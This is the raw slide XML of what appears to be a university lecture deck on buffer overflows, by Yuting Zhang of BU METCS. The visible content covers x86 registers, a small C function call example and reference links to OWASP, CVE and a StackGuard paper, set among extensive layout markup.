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4f02bda0f1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f02bda0f1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504472e849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04472e849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504472e849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04472e849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504472e849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04472e849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504472e84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04472e84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504472e849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04472e849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4f02bda0f1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f02bda0f1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504472e849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504472e849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504472e849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504472e849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504472e849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504472e849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504472e849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04472e849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504472e849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504472e849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c168e6280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c168e6280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c168e6280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c168e6280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c168e6280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c168e6280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4f02bda0f1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4f02bda0f1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4f02bda0f1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4f02bda0f1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4f02bda0f1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4f02bda0f1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504472e849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504472e849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504472e8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504472e8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504472e849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504472e849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4f02bda0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f02bda0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500168de4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500168de4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5240a6fc1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5240a6fc1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5240a6fc1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5240a6fc1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500168de4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500168de4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500168de4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500168de4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500168de4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500168de4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5240a6fc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5240a6fc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5240a6fc1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5240a6fc1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5240a6fc1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5240a6fc1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500168de4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500168de4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504472e84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04472e8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4f02bda0f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f02bda0f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504472e84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04472e84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4f02bda0f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f02bda0f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4f02bda0f1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f02bda0f1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504472e84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04472e84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57172" y="205014"/>
            <a:ext cx="8228700" cy="858900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="76025" lIns="76025" spcFirstLastPara="1" rIns="76025" wrap="square" tIns="76025">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="1203631"/>
            <a:ext cx="8228700" cy="2983500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="76025" lIns="76025" spcFirstLastPara="1" rIns="76025" wrap="square" tIns="76025">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-228600" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-228600" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-228600" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-228600" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-228600" lvl="5" marL="2743200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-228600" lvl="6" marL="3200400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-228600" lvl="7" marL="3657600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>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53" name="Shape 53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="205014"/>
            <a:ext cx="8228700" cy="858900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="76025" lIns="76025" spcFirstLastPara="1" rIns="76025" wrap="square" tIns="76025">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="1203631"/>
            <a:ext cx="8228700" cy="1422900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="76025" lIns="76025" spcFirstLastPara="1" rIns="76025" wrap="square" tIns="76025">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-228600" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-228600" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-228600" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-228600" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-228600" lvl="5" marL="2743200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-228600" lvl="6" marL="3200400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-228600" lvl="7" marL="3657600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="2761933"/>
            <a:ext cx="8228700" cy="1422900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="76025" lIns="76025" spcFirstLastPara="1" rIns="76025" wrap="square" tIns="76025">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-228600" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-228600" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-228600" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-228600" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-228600" lvl="5" marL="2743200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-228600" lvl="6" marL="3200400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-228600" lvl="7" marL="3657600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrik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56000" y="7700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875750"/>
            <a:ext cx="8520600" cy="3693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hyperlink" Target="http://compilers.cs.ucla.edu/fernando/projects/puzzles/tutoria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handsonsecurity.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Buffer_Overflow"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23.png"/><Relationship Id="rId6"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cve.mitre.or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cs.purdue.edu/homes/xyzhang/spring07/Papers/defeat-stackguard.pdf" TargetMode="Externa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7.pn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1.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Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;62;p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Yuting Zhang</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>BU METCS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156000" y="7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Registers (Intel X86 32 bits)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077575" y="1023475"/>
            <a:ext cx="5094634" cy="3820975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1521463" y="4634550"/>
            <a:ext cx="54045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150">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1150" u="sng">
                <a:solidFill>
                  <a:srgbClr val="005999"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>A tutorial on Register Allocation by Puzzle Solving</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> (on compilers.cs.ucla.edu)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426725" y="3272150"/>
            <a:ext cx="212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1" name="Google Shape;171;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6619175" y="1518450"/>
            <a:ext cx="2057400" cy="1379400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -82744" name="adj1"/>
              <a:gd fmla="val 4266"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General purpose data registers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675375" y="3165225"/>
            <a:ext cx="2057400" cy="1572000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -82744" name="adj1"/>
              <a:gd fmla="val 4266"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Pointer registers:</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EBP: frame (base) pointer</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ESI: Source Index</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EDI: Destination Index</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ESP: stack pointer</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156000" y="7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Assembly Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Int main() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	foo(1,2);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>void foo (int a, int b) {</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
